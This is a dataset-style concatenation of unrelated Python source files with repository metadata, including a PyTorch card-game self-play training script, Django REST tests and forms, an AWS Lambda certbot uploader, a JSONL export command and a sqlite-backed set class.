        class_values = self.class_eye[class_datas].view(-1, 16).unsqueeze(-1)
        class_values = class_values.expand(-1, 16, self.short_mid)
        deck_type_values = self.deck_type_eye[deck_type_datas].view(-1, 8).unsqueeze(-1)
        deck_type_values = deck_type_values.expand(-1, 8, self.short_mid)

        # Multi-hot ability flags per follower.
        abilities = torch.sum(self.ability_eye[follower_abilities], dim=2)

        # Followers: stats + abilities + embedded card + the three action flags.
        follower_cards = self.prelu_layer(self.field_value_layer(self.emb1(follower_card_ids)).view(-1, 10, 10))
        x2 = torch.cat([stats, abilities, follower_cards, able_to_attack, able_to_creature_attack, able_to_evo], dim=2)
        follower_values = self.prelu_layer(self.value_layer(x2))

        amulet_cards = self.prelu_layer(self.field_value_layer(self.emb1(amulet_card_ids)).view(-1, 10, 10))
        amulet_values = torch.sigmoid(self.amulet_value_layer(amulet_cards))

        life_values = self.prelu_layer(self.life_layer(life_datas)).view(-1, 1, self.short_mid)

        hand_cards = self.prelu_layer(self.hand_value_layer(self.emb1(hand_ids)).view(-1, 9, 10))
        # BUG FIX: the original assigned from the undefined name
        # `_hand_card_value` (missing "s"), raising NameError on every call.
        hand_card_values = torch.sigmoid(self.hand_integrate_layer(hand_cards))

        deck_cards = self.prelu_layer(self.deck_value_layer(self.emb1(deck_datas)).view(-1, 40, 10))
        deck_card_values = torch.sigmoid(self.deck_integrate_layer(deck_cards))

        # Entity slots: 10 followers + 10 amulets + 1 life + 16 class + 8 deck
        # type + 9 hand + 40 deck = 94.
        input_tensor = [follower_values, amulet_values, life_values,
                        class_values, deck_type_values, hand_card_values, deck_card_values]
        before_x = torch.cat(input_tensor, dim=1)
        x = self.prelu_layer(self.concat_layer(before_x)).view(-1, 94 * self.short_mid)
        for i in range(self.modify_layer_num):
            x = self.prelu_layer(self.modify_layer[i](x))
        return x
def get_data(f,player_num=0):
    """Serialise the game field ``f`` from ``player_num``'s point of view.

    Returns a dict of fixed-size features: hand/deck/field card ids
    (indices into the global ``names`` list), follower stats/abilities,
    0/1 action masks and scalar life/pp data (mostly normalised by /20
    or /10).  Empty slots are zero-padded: 9 hand slots, 40 deck slots,
    and 5 + 5 field slots (own side first, then the opponent's).
    """
    hand_ids = []
    hand_card_costs = []
    player = f.players[player_num]
    opponent = f.players[1-player_num]
    # Hand: card name indices and costs, zero-padded to 9 entries.
    hand_ids = [names.index(card.name) for card in player.hand]
    hand_card_costs = [card.cost/20 for card in player.hand]
    hand_ids.extend([0]*(9-len(player.hand)))
    hand_card_costs.extend([0]*(9-len(player.hand)))
    # Remaining deck contents, sorted, zero-padded to 40 entries.
    deck_data = sorted([names.index(card.name)# ((Card_Category[card.card_category].value-1)*1000+card.card_id+500)
                        for card in player.deck.deck])
    deck_data.extend([0]*(40-len(player.deck.deck)))
    opponent_num = 1- player_num
    # Mask of the opponent board slots occupied by creatures (valid targets).
    opponent_creature_location = f.get_creature_location()[opponent_num]
    opponent_mask = [1 if i in opponent_creature_location else 0 for i in range(5)]
    able_to_evo = f.get_able_to_evo(player)
    able_to_evo = [1 if i in able_to_evo else 0 for i in range(5)] + opponent_mask
    # Field followers: own 5 slots first, then the opponent's 5 slots;
    # empty or non-creature slots are encoded as 0 / zero rows.
    follower_card_ids = [names.index(f.card_location[player_num][i].name)
                         if i < len(f.card_location[player_num])
                         and f.card_location[player_num][i].card_category == "Creature"
                         else 0 for i in range(5)] \
                        + [names.index(f.card_location[opponent_num][i].name)
                           if i < len(f.card_location[opponent_num])
                           and f.card_location[opponent_num][i].card_category == "Creature"
                           else 0 for i in range(5)]
    # Per-follower rows: power/20, toughness/20, presence flag and attack
    # permissions (opponent followers are assumed always able to attack).
    follower_stats = [[f.card_location[player_num][i].power/20, f.card_location[player_num][i].get_current_toughness()/20,
                       1, int(f.card_location[player_num][i].can_attack_to_follower()), int(f.card_location[player_num][i].can_attack_to_player()),1]
                      if i < len(f.card_location[player_num])
                      and f.card_location[player_num][i].card_category == "Creature"
                      else [0, 0, 0, 0, 0,0] for i in range(5)] \
                     + [[f.card_location[opponent_num][i].power/20, f.card_location[opponent_num][i].get_current_toughness()/20,
                         1, 1, 1, 1]
                        if i < len(f.card_location[opponent_num])
                        and f.card_location[opponent_num][i].card_category == "Creature"
                        else [0, 0, 0, 0, 0, 0] for i in range(5)]
    follower_abilities = [f.card_location[player_num][i].ability[:]
                          if i < len(f.card_location[player_num])
                          and f.card_location[player_num][i].card_category == "Creature"
                          else [] for i in range(5)] \
                         + [f.card_location[opponent_num][i].ability[:]
                            if i < len(f.card_location[opponent_num])
                            and f.card_location[opponent_num][i].card_category == "Creature"
                            else [] for i in range(5)]
    amulet_card_ids = [names.index(f.card_location[player_num][i].name)#f.card_location[player_num][i].card_id + 500
                       if i < len(f.card_location[player_num])
                       and f.card_location[player_num][i].card_category == "Amulet"
                       else 0 for i in range(5)] \
                      + [names.index(f.card_location[opponent_num][i].name)
                         if i < len(f.card_location[opponent_num])
                         and f.card_location[opponent_num][i].card_category == "Amulet"
                         else 0 for i in range(5)]
    # 0/1 action masks: playable hand slots, attackable slots + targets.
    able_to_play = f.get_able_to_play(player)
    able_to_play = [1 if i in able_to_play else 0 for i in range(9)]
    able_to_attack = f.get_able_to_attack(player)
    able_to_attack = [1 if i in able_to_attack else 0 for i in range(5)] + opponent_mask
    able_to_creature_attack = f.get_able_to_creature_attack(player)
    able_to_creature_attack = [1 if i in able_to_creature_attack else 0 for i in range(5)] + opponent_mask
    life_data = [player.life/20, opponent.life/20, len(player.hand)/10, len(opponent.hand)/10,f.current_turn[player_num]/10]
    pp_data = [f.cost[player_num]/10, f.remain_cost[player_num]/10,f.cost[1-player_num]/10, f.remain_cost[1-player_num]/10]
    # both normalised to the 0-1 range
    class_data = [player.deck.leader_class.value,
                  opponent.deck.leader_class.value]
    deck_type_data = [player.deck.deck_type,opponent.deck.deck_type]
    # Bundle the scalar features into one tuple (consumed by the network).
    life_data = (life_data, class_data,deck_type_data)
    # datas = Detailed_State_data(hand_ids, hand_card_costs, follower_card_ids, amulet_card_ids,
    #                        follower_stats, follower_abilities, able_to_evo, life_data, pp_data,
    #                        able_to_play, able_to_attack, able_to_creature_attack,deck_data)
    datas = {"hand_ids":hand_ids,
             "hand_card_costs":hand_card_costs,
             "follower_card_ids":follower_card_ids,
             "amulet_card_ids":amulet_card_ids,
             "follower_stats":follower_stats,
             "follower_abilities":follower_abilities,
             "able_to_evo":able_to_evo,
             "life_data":life_data,
             "pp_data":pp_data,
             "able_to_play":able_to_play,
             "able_to_attack":able_to_attack,
             "able_to_creature_attack":able_to_creature_attack,
             "deck_data":deck_data}
    return datas
# Mapping from internal deck id to a human-readable deck name; negative ids
# are "basic" starter decks and 100 is a test deck.
deck_id_2_name = {0: "Sword_Aggro", 1: "Rune_Earth", 2: "Sword", 3: "Shadow", 4: "Dragon_PDK", 5: "Haven",
                  6: "Blood", 7: "Dragon", 8: "Forest", 9: "Rune", 10: "DS_Rune", -1: "Forest_Basic", -2: "Sword_Basic",
                  -3: "Rune_Basic",
                  -4: "Dragon_Basic", -5: "FOREST_Basic", -6: "Blood_Basic", -7: "Haven_Basic", -8: "Portal_Basic",
                  100: "TEST",
                  -9: "Spell-Rune", 11: "PtP-Forest", 12: "Mid-Shadow", 13: "Neutral-Blood"}
# Mapping from deck id to (deck-list .tsv file, leader class name).
# NOTE(review): not every id present in deck_id_2_name has an entry here.
key_2_tsv_name = {0: ["Sword_Aggro.tsv", "SWORD"], 1: ["Rune_Earth.tsv", "RUNE"], 2: ["Sword.tsv", "SWORD"],
                  3: ["New-Shadow.tsv", "SHADOW"], 4: ["Dragon_PDK.tsv", "DRAGON"], 5: ["Test-Haven.tsv", "HAVEN"],
                  6: ["Blood.tsv", "BLOOD"], 7: ["Dragon.tsv", "DRAGON"], 8: ["Forest.tsv", "FOREST"],
                  9: ["SpellBoost-Rune.tsv", "RUNE"], 10: ["Dimension_Shift_Rune.tsv", "RUNE"],
                  11: ["PtP_Forest.tsv", "FOREST"], 12: ["Mid_Shadow.tsv", "SHADOW"],
                  13: ["Neutral_Blood.tsv", "BLOOD"],100: ["TEST.tsv", "SHADOW"],
                  -2: ["Sword_Basic.tsv", "SWORD"]}
# +
def deck_id_2_deck_type(type_num):
    """Map a deck id to the matching DeckType archetype value."""
    if type_num in (0, 1):
        return DeckType.AGGRO.value
    if type_num in (5, 6, 7):
        return DeckType.CONTROL.value
    if type_num in (8, 9, 10, -9, 11):
        return DeckType.COMBO.value
    # Every other deck id is treated as a midrange deck.
    return DeckType.MID.value
# -
if __name__ == "__main__":
    # CLI options for training the dual neural network from self-play data.
    parser = argparse.ArgumentParser(description='デュアルニューラルネットワーク学習コード')
    parser.add_argument('--episode_num', help='試行回数')
    parser.add_argument('--iteration_num', help='イテレーション数')
    parser.add_argument('--epoch_num', help='エポック数')
    parser.add_argument('--batch_size', help='バッチサイズ')
    parser.add_argument('--mcts', help='サンプリングAIをMCTSにする(オリジナルの場合は[OM])')
    parser.add_argument('--deck', help='サンプリングに用いるデッキの選び方')
    parser.add_argument('--cuda', help='gpuを使用するかどうか')
    parser.add_argument('--multi_train', help="学習時も並列化するかどうか")
    parser.add_argument('--epoch_interval', help="モデルの保存間隔")
    parser.add_argument('--fixed_deck_id', help="使用デッキidの固定")
    parser.add_argument('--cpu_num', help="使用CPU数", default=2 if torch.cuda.is_available() else 3)
    parser.add_argument('--batch_num', help='サンプルに対するバッチの数')
    # Parse once; the original called parse_args() twice, which is redundant.
    args = parser.parse_args()
    deck_flg = int(args.fixed_deck_id) if args.fixed_deck_id is not None else None
    net = New_Dual_Net(100)
    if torch.cuda.is_available() and args.cuda == "True":
        net = net.cuda()
        print("cuda is available.")
    cuda_flg = args.cuda == "True"
    from emulator_test import *  # must be imported first because of import-order dependencies
    from Field_setting import *
    from Player_setting import *
    from Policy import *
    from Game_setting import Game
    G = Game()
    # Hyper-parameters, overridable from the command line.
    episode_len = int(args.episode_num) if args.episode_num is not None else 100
    batch_size = int(args.batch_size) if args.batch_size is not None else 100
    iteration = int(args.iteration_num) if args.iteration_num is not None else 10
    epoch_num = int(args.epoch_num) if args.epoch_num is not None else 2
    mcts = args.mcts is not None
    import datetime
    t1 = datetime.datetime.now()
    print(t1)
    R = New_Dual_ReplayMemory(100000)
    net.zero_grad()
    # Keep a frozen copy of the network to act as the sparring opponent.
    prev_net = copy.deepcopy(net)
    import os
    optimizer = optim.Adam(net.parameters(), weight_decay=0.01)
for epoch in range(epoch_num):
print("epoch {}".format(epoch+1))
R = New_Dual_ReplayMemory(100000)
p1 = Player(9, True, policy=New_Dual_NN_Non_Rollout_OM_ISMCTSPolicy(origin_model=net, cuda=cuda_flg))
p1.name = "Alice"
p2 = Player(9, False, policy=New_Dual_NN_Non_Rollout_OM_ISMCTSPolicy(origin_model=prev_net, cuda=cuda_flg))
p2.name = "Bob"
win_num = 0
for episode in tqdm(range(episode_len)):
f = Field(5)
deck_type1 = deck_flg
deck_type2 = deck_flg
if deck_flg is None:
deck_type1 = random.choice(list(key_2_tsv_name.keys()))
deck_type2 = random.choice(list(key_2_tsv_name.keys()))
d1 = tsv_to_deck(key_2_tsv_name[deck_type1][0])
d1.set_leader_class(key_2_tsv_name[deck_type1][1])
d2 = tsv_to_deck(key_2_tsv_name[deck_type2][0])
d2.set_leader_class(key_2_tsv_name[deck_type2][1])
d1.shuffle()
d2.shuffle()
p1.deck = d1
p2.deck = d2
f.players = [p1, p2]
p1.field = f
p2.field = f
#import cProfile
#cProfile.run("G.start_for_dual(f, virtual_flg=True, target_player_num=episode % 2)",sort="tottime")
#assert False
train_data, reward = G.start_for_dual(f, virtual_flg=True, target_player_num=episode % 2)
f.players[0].life = 20
f.players[0].hand.clear()
f.players[0].deck = None
f.players[0].lib_out_flg = False
f.players[1].life = 20
f.players[1].hand.clear()
f.players[1].deck = None
f.players[1].lib_out_flg = False
for i in range(2):
for data in train_data[i]:
R.push(data[0], data[1], data[2], data[3], reward[i])
win_num += int(reward[episode % 2] > 0)
print("sample_size:{}".format(len(R.memory)))
print("win_rate:{:.2%}".format(win_num/episode_len))
prev_net = copy.deepcopy(net)
sum_of_loss = 0
sum_of_MSE = 0
sum_of_CEE = 0
p,pai,z,states,loss = None, None, None, None,None
current_net, prev_optimizer = None, None
for i in tqdm(range(iteration)):
print("\ni:{}\n".format(i))
states, actions, rewards = R.sample(batch_size)
states['target'] = {'actions':actions, 'rewards':rewards}
p, v, loss = net(states,target=True)
z = rewards
pai = actions#45種類の抽象化した行動
if (i + 1) % 100== 0:
print("target:{} output:{}".format(z[0],v[0]))
print("target:{} output:{}".format(pai[0], p[0]))
print("loss:{}".format([loss[j].item() for j in range(3)]))
if torch.isnan(loss):
# section 3
net = current_net
optimizer = torch.optim.Adam(net.parameters())
optimizer.load_state_dict(prev_optimizer.state_dict())
else:
current_net = copy.deepcopy(net)
prev_optimizer = copy.deepcopy(optimizer)
optimizer.zero_grad()
loss[0].backward()
sum_of_loss += float(loss[0].item())
sum_of_MSE += float(loss[1].item())
sum_of_CEE += float(loss[2].item())
optimizer.step()
print("{}".format(epoch + 1))
print("AVE | Over_All_Loss: {:.3f} | MSE: {:.3f} | CEE:{:.3f}"\
.format(sum_of_loss/iteration,sum_of_MSE/iteration,sum_of_CEE/iteration))
if torch.isnan(loss[0]):
for key in list(net.state_dict().keys()):
print(key, net.state_dict()[key].size())
if len(net.state_dict()[key].size()) == 1:
print(torch.max(net.state_dict()[key], dim=0), "\n", torch.min(net.state_dict()[key], dim=0))
else:
print(torch.max(net.state_dict()[key], 0), "\n", torch.min(net.state_dict()[key], 0))
print("")
assert False
if epoch_num > 4 and (epoch+1) % (epoch_num//4) == 0 and epoch+1 < epoch_num:
PATH = "model/Dual_{}_{}_{}_{}_{}_{}_{:.0%}.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
t1.second, (epoch+1)/epoch_num)
if torch.cuda.is_available() and cuda_flg:
PATH = "model/Dual_{}_{}_{}_{}_{}_{}_{:.0%}_cuda.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
t1.second, (epoch + 1) / epoch_num)
torch.save(net.state_dict(), PATH)
print("{} is saved.".format(PATH))
print('Finished Training')
#PATH = './value_net.pth'
#PATH = './value_net.pth'
PATH = "model/Dual_{}_{}_{}_{}_{}_{}_all.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
t1.second)
if torch.cuda.is_available() and cuda_flg:
PATH = "model/Dual_{}_{}_{}_{}_{}_{}_all_cuda.pth".format(t1.year, t1.month, t1.day, t1.hour, t1.minute,
t1.second)
torch.save(net.state_dict(), PATH)
print("{} is saved.".format(PATH))
t2 = datetime.datetime.now()
print(t2)
print(t2-t1)
| 20,388 | 35 | 408 |
7cfa0517f6f611e9e8a1d7cb043611f70bfb1a0f | 2,196 | py | Python | app/recipe/tests/test_tag_api.py | Ivanrputra/recipe-app-api | e70548a4f7f8756f8f4224dcf39b809a8b546da1 | [
"MIT"
] | null | null | null | app/recipe/tests/test_tag_api.py | Ivanrputra/recipe-app-api | e70548a4f7f8756f8f4224dcf39b809a8b546da1 | [
"MIT"
] | null | null | null | app/recipe/tests/test_tag_api.py | Ivanrputra/recipe-app-api | e70548a4f7f8756f8f4224dcf39b809a8b546da1 | [
"MIT"
] | null | null | null | from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
# test the publicly avalialbel tags api
# test the authorized user tags api | 28.894737 | 64 | 0.754554 | from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Tag
from recipe.serializers import TagSerializer
TAGS_URL = reverse('recipe:tag-list')
class PublicTagsApiTest(TestCase):
    """Test the publicly available tags API."""

    def setUp(self):
        self.client = APIClient()

    def test_login_required(self):
        """Retrieving tags must require authentication."""
        response = self.client.get(TAGS_URL)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateTagsApiTest(TestCase):
    """Test the tags API for an authenticated user."""

    def setUp(self):
        self.user = get_user_model().objects.create_user(
            'ivanrputa@gmail.com',
            '12345678'
        )
        self.client = APIClient()
        self.client.force_authenticate(self.user)

    def test_retrieve_tags(self):
        """Listing tags returns them ordered by name, descending."""
        for tag_name in ('Vegan', 'Dessert'):
            Tag.objects.create(user=self.user, name=tag_name)
        response = self.client.get(TAGS_URL)
        expected = TagSerializer(Tag.objects.all().order_by('-name'), many=True)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data, expected.data)

    def test_tags_limited_to_user(self):
        """Only tags owned by the authenticated user are returned."""
        other_user = get_user_model().objects.create_user(
            'ivanrputra2@gmail.com',
            '123457789'
        )
        Tag.objects.create(user=other_user, name="Fruit")
        own_tag = Tag.objects.create(user=self.user, name="Comfort food")
        response = self.client.get(TAGS_URL)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(len(response.data), 1)
        self.assertEqual(response.data[0]['name'], own_tag.name)

    def test_create_tag_successful(self):
        """Posting a valid payload creates the tag for the current user."""
        payload = {'name': "Test Tag"}
        self.client.post(TAGS_URL, payload)
        created = Tag.objects.filter(
            user=self.user,
            name=payload['name']
        ).exists()
        self.assertTrue(created)

    def test_create_tag_invalid(self):
        """Posting an empty name is rejected with HTTP 400."""
        payload = {'name': ''}
        response = self.client.post(TAGS_URL, payload)
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
5b244dbad1c8ca8a9375ead11274a786704c74b2 | 789 | py | Python | gardenizer/event/forms.py | plegulluche/OPC-P13 | 0bad4e1bd7293e5a3397611f80df00ca2fd9cf60 | [
"Unlicense"
] | null | null | null | gardenizer/event/forms.py | plegulluche/OPC-P13 | 0bad4e1bd7293e5a3397611f80df00ca2fd9cf60 | [
"Unlicense"
] | null | null | null | gardenizer/event/forms.py | plegulluche/OPC-P13 | 0bad4e1bd7293e5a3397611f80df00ca2fd9cf60 | [
"Unlicense"
] | null | null | null | from django import forms
from event.models import Customer, Evenement
| 19.725 | 47 | 0.52218 | from django import forms
from event.models import Customer, Evenement
class AddCustomerForm(forms.ModelForm):
    """Form for creating a customer with basic contact and address details."""

    class Meta:
        model = Customer
        fields = ("firstname", "lastname", "phone", "company",
                  "street_number", "streetname", "city")
class AddMaintenanceEventForm(forms.ModelForm):
    """Form for scheduling a maintenance event.

    ``event_start`` / ``event_end`` are declared on the form but are not
    listed in ``Meta.fields`` -- presumably handled separately by the view
    (TODO confirm).
    """
    event_start = forms.DateTimeField()
    event_end = forms.DateTimeField()

    class Meta:
        model = Evenement
        fields = ("title", "description")
class AddCustomerEventForm(forms.ModelForm):
    """Form for creating an event linked to a customer."""

    class Meta:
        model = Evenement
        fields = ("title", "description", "customer")
| 0 | 647 | 69 |
470a6e476d032e3bf06631db5a62d5885240fdf0 | 1,184 | py | Python | app/handler.py | KiraLT/certbot-lambda | 3bec9e3575a67345849778f55227836591c5eee7 | [
"MIT"
] | 2 | 2022-01-19T07:27:30.000Z | 2022-02-08T17:25:23.000Z | app/handler.py | KiraLT/certbot-lambda | 3bec9e3575a67345849778f55227836591c5eee7 | [
"MIT"
] | null | null | null | app/handler.py | KiraLT/certbot-lambda | 3bec9e3575a67345849778f55227836591c5eee7 | [
"MIT"
] | 1 | 2022-02-16T14:38:36.000Z | 2022-02-16T14:38:36.000Z | #!/usr/bin/env python3
import shutil
from app.settings import settings
from app.services.certbot import obtain_certbot_certs
from app.services.aws import list_secret_names, upload_certs_as_secrets
if __name__ == "__main__":
handler(None, None)
| 29.6 | 80 | 0.697635 | #!/usr/bin/env python3
import shutil
from app.settings import settings
from app.services.certbot import obtain_certbot_certs
from app.services.aws import list_secret_names, upload_certs_as_secrets
def handler(_event, _context):
    """AWS Lambda entry point: obtain certificates via certbot and upload
    them to AWS Secrets Manager.

    The certbot working directory is wiped before the run and again in the
    ``finally`` block so repeated invocations start from a clean filesystem.
    Returns a human-readable status message.
    """
    try:
        shutil.rmtree(str(settings.CERTBOT_DIR), ignore_errors=True)
        # Load secret names early to check if aws client is configured correctly
        secret_names = list_secret_names()
        certs = obtain_certbot_certs(
            emails=settings.CERTBOT_EMAILS,
            domains=settings.CERTBOT_DOMAINS,
            dns_plugin=settings.CERTBOT_DNS_PLUGIN,
            certbot_dir=settings.CERTBOT_DIR,
            certbot_server=settings.CERTBOT_SERVER,
            preferred_chain=settings.CERTBOT_PREFERRED_CHAIN
        )
        upload_certs_as_secrets(
            certs,
            name=settings.AWS_SECRET_NAME,
            secret_names=secret_names,
            description=settings.AWS_SECRET_DESCRIPTION
        )
    finally:
        # Always clean up the certbot directory, even on failure.
        shutil.rmtree(str(settings.CERTBOT_DIR), ignore_errors=True)
    return "Certificates obtained and uploaded successfully."
if __name__ == "__main__":
handler(None, None)
| 908 | 0 | 23 |
5a2b9719bea651a230205b8011c0b27198c10cbf | 23 | py | Python | something-learned/Algorithms and Data-Structures/Competitive-programming-library/CP/codeforces/656A-Da_Vinci_Powers.py | gopala-kr/CR-101 | dd27b767cdc0c667655ab8e32e020ed4248bd112 | [
"MIT"
] | 5 | 2018-05-09T04:02:04.000Z | 2021-02-21T19:27:56.000Z | something-learned/Algorithms and Data-Structures/Competitive-programming-library/CP/codeforces/656A-Da_Vinci_Powers.py | gopala-kr/CR-101 | dd27b767cdc0c667655ab8e32e020ed4248bd112 | [
"MIT"
] | null | null | null | something-learned/Algorithms and Data-Structures/Competitive-programming-library/CP/codeforces/656A-Da_Vinci_Powers.py | gopala-kr/CR-101 | dd27b767cdc0c667655ab8e32e020ed4248bd112 | [
"MIT"
] | 5 | 2018-02-23T22:08:28.000Z | 2020-08-19T08:31:47.000Z | x = input()
print 2**x
| 7.666667 | 11 | 0.565217 | x = input()
print 2**x
| 0 | 0 | 0 |
75ac623f7b66719ba7e41213f1ae301dee5d15a5 | 89 | py | Python | enthought/mayavi/tools/modules.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | 3 | 2016-12-09T06:05:18.000Z | 2018-03-01T13:00:29.000Z | enthought/mayavi/tools/modules.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | 1 | 2020-12-02T00:51:32.000Z | 2020-12-02T08:48:55.000Z | enthought/mayavi/tools/modules.py | enthought/etsproxy | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | [
"BSD-3-Clause"
] | null | null | null | # proxy module
from __future__ import absolute_import
from mayavi.tools.modules import *
| 22.25 | 38 | 0.831461 | # proxy module
from __future__ import absolute_import
from mayavi.tools.modules import *
| 0 | 0 | 0 |
b20f312d2d730133f52e15d77c7b0a9506e0f4bd | 454 | py | Python | backend/urls.py | Rayman/fusic-django | a3bc19cb5d0a013df649e5f59941c98c7ffec159 | [
"MIT"
] | null | null | null | backend/urls.py | Rayman/fusic-django | a3bc19cb5d0a013df649e5f59941c98c7ffec159 | [
"MIT"
] | 14 | 2020-02-11T21:32:22.000Z | 2022-02-26T02:10:23.000Z | backend/urls.py | Rayman/fusic-django | a3bc19cb5d0a013df649e5f59941c98c7ffec159 | [
"MIT"
] | 1 | 2019-03-07T04:04:02.000Z | 2019-03-07T04:04:02.000Z | from django.conf.urls import url
from django.urls import include
from rest_framework.routers import DefaultRouter
from . import views
router = DefaultRouter()
router.register(r"users", views.UserViewSet)
router.register(r"playlists", views.PlaylistViewSet)
router.register(r"radios", views.RadioViewSet)
router.register(r"songs", views.SongViewSet)
urlpatterns = router.urls
urlpatterns += [
url(r"^api-auth/", include("rest_framework.urls")),
]
| 25.222222 | 55 | 0.779736 | from django.conf.urls import url
from django.urls import include
from rest_framework.routers import DefaultRouter
from . import views
router = DefaultRouter()
router.register(r"users", views.UserViewSet)
router.register(r"playlists", views.PlaylistViewSet)
router.register(r"radios", views.RadioViewSet)
router.register(r"songs", views.SongViewSet)
urlpatterns = router.urls
urlpatterns += [
url(r"^api-auth/", include("rest_framework.urls")),
]
| 0 | 0 | 0 |
a1c9431bd64c2749eaeedd18e74822b26b4497e1 | 2,007 | py | Python | minotaur/scripts/jsonl.py | csmith49/minotaur | 982e128b440e2c8fe96c450505dfdac9a37f9551 | [
"MIT"
] | null | null | null | minotaur/scripts/jsonl.py | csmith49/minotaur | 982e128b440e2c8fe96c450505dfdac9a37f9551 | [
"MIT"
] | null | null | null | minotaur/scripts/jsonl.py | csmith49/minotaur | 982e128b440e2c8fe96c450505dfdac9a37f9551 | [
"MIT"
] | null | null | null | import click
from .cli import cli
from ..maze import Maze
from ..interface import load, is_context, is_value
from json import dumps
from sys import stdout
from typing import Iterable, Callable, Tuple, TypeVar
from itertools import chain, filterfalse, tee
T = TypeVar("T")
def partition(iterable : Iterable[T], predicate : Callable[[T], bool]) -> Tuple[Iterable[T], Iterable[T]]:
"""Partition an iterable by a predicate."""
iter1, iter2 = tee(iterable)
return filterfalse(predicate, iter1), filter(predicate, iter2)
def entries(maze : Maze) -> Iterable:
"""Convert a maze to a sequence of rows in a JSONL-encoded table."""
if is_context(maze):
values, contexts = partition(maze.mazes(), is_context)
# pre-populate the entry with the values
entry = {value.symbol : value.value for value in values}
# tag the maze symbol with the key
entry[f"{maze.symbol}:key"] = maze.key
# and add the duration
entry[f"{maze.symbol}:duration"] = maze.value.duration
# now, merge with all the sub-contexts (if they exist!)
contexts = list(contexts)
if contexts:
context_entries = (entries(context) for context in contexts)
for context_entry in chain.from_iterable(context_entries):
yield {**entry, **context_entry}
else:
yield entry
def dump(maze : Maze, fp):
"""Dump the paths of a maze to the provided file pointer."""
for entry in entries(maze):
fp.write(f"{dumps(entry)}\n")
@cli.command()
@click.argument("filepath")
@click.option("-o", "--output", type=str, help="Output file to which rows will be appended.")
def jsonl(filepath, output):
"""Convert a message log into a JSONL-encoded table."""
mazes = load(filepath=filepath)
if output:
with open(output, "a") as f:
for maze in mazes:
dump(maze, f)
else:
for maze in mazes:
dump(maze, stdout)
| 30.876923 | 106 | 0.63727 | import click
from .cli import cli
from ..maze import Maze
from ..interface import load, is_context, is_value
from json import dumps
from sys import stdout
from typing import Iterable, Callable, Tuple, TypeVar
from itertools import chain, filterfalse, tee
T = TypeVar("T")
def partition(iterable : Iterable[T], predicate : Callable[[T], bool]) -> Tuple[Iterable[T], Iterable[T]]:
"""Partition an iterable by a predicate."""
iter1, iter2 = tee(iterable)
return filterfalse(predicate, iter1), filter(predicate, iter2)
def entries(maze : Maze) -> Iterable:
"""Convert a maze to a sequence of rows in a JSONL-encoded table."""
if is_context(maze):
values, contexts = partition(maze.mazes(), is_context)
# pre-populate the entry with the values
entry = {value.symbol : value.value for value in values}
# tag the maze symbol with the key
entry[f"{maze.symbol}:key"] = maze.key
# and add the duration
entry[f"{maze.symbol}:duration"] = maze.value.duration
# now, merge with all the sub-contexts (if they exist!)
contexts = list(contexts)
if contexts:
context_entries = (entries(context) for context in contexts)
for context_entry in chain.from_iterable(context_entries):
yield {**entry, **context_entry}
else:
yield entry
def dump(maze : Maze, fp):
    """Write each row of the maze as one JSON object per line to *fp*."""
    fp.writelines(f"{dumps(row)}\n" for row in entries(maze))
@cli.command()
@click.argument("filepath")
@click.option("-o", "--output", type=str, help="Output file to which rows will be appended.")
def jsonl(filepath, output):
    """Convert a message log into a JSONL-encoded table."""
    mazes = load(filepath=filepath)
    # Append to the given file when --output is passed, otherwise stream
    # the rows to stdout.
    if output:
        with open(output, "a") as f:
            for maze in mazes:
                dump(maze, f)
    else:
        for maze in mazes:
            dump(maze, stdout)
006cfef7d4a9b065e2e1a48f2fd3b717d9a8e288 | 1,356 | py | Python | gdsync/google/finished_folders.py | UUUM/backup-google-drive | ad632f5deb824237ca4a51af5e76a4261cc4759e | [
"MIT"
] | 6 | 2016-08-09T12:00:48.000Z | 2018-03-05T04:59:48.000Z | gdsync/google/finished_folders.py | UUUM/backup-google-drive | ad632f5deb824237ca4a51af5e76a4261cc4759e | [
"MIT"
] | null | null | null | gdsync/google/finished_folders.py | UUUM/backup-google-drive | ad632f5deb824237ca4a51af5e76a4261cc4759e | [
"MIT"
] | null | null | null | import os
import sqlite3
import gdsync
| 22.6 | 74 | 0.544985 | import os
import sqlite3
import gdsync
class FinishedFolders(set):
    """Set of folder ids already synced, persisted in a sqlite database.

    The set contents mirror a single-column ``finished_folders`` table:
    ``load`` pulls the stored ids into the set, ``save`` upserts the
    current members back.
    """
    db_file_name = 'default.db'
    db_file = None
    table = 'finished_folders'
    _conn = None

    def __init__(self):
        # Default the database path into the package var directory.
        if self.db_file is None:
            self.db_file = os.path.join(gdsync.VAR_DIR, self.db_file_name)

    def __enter__(self):
        # Allow use as a context manager that closes the connection on exit.
        return self

    def __exit__(self, exc_type=None, exc_value=None, traceback=None):
        # BUG FIX: the original signature ``__exit__(self)`` did not accept
        # the exception triple, so any ``with`` usage raised TypeError
        # instead of closing the connection. Defaults keep manual
        # no-argument calls working.
        if self._conn is not None:
            self._conn.close()

    @property
    def conn(self):
        """Lazily opened sqlite connection with the table ensured."""
        if not self._conn:
            self._conn = self._connect()
            self._initialize_table()
        return self._conn

    def load(self):
        """Populate the set from the database; returns self."""
        sql = 'select id from %s' % self.table
        for row in self.conn.execute(sql):
            self.add(row[0])
        return self

    def save(self):
        """Write every member to the database (insert-or-replace); returns self."""
        for folder_id in self:
            self.conn.execute('''
                insert or replace into %s (id)
                values (?)
            ''' % self.table, (folder_id,))
        self.conn.commit()
        return self

    def _connect(self):
        # Create the parent directory on demand; guard against a bare file
        # name whose dirname is the empty string (os.makedirs('') raises).
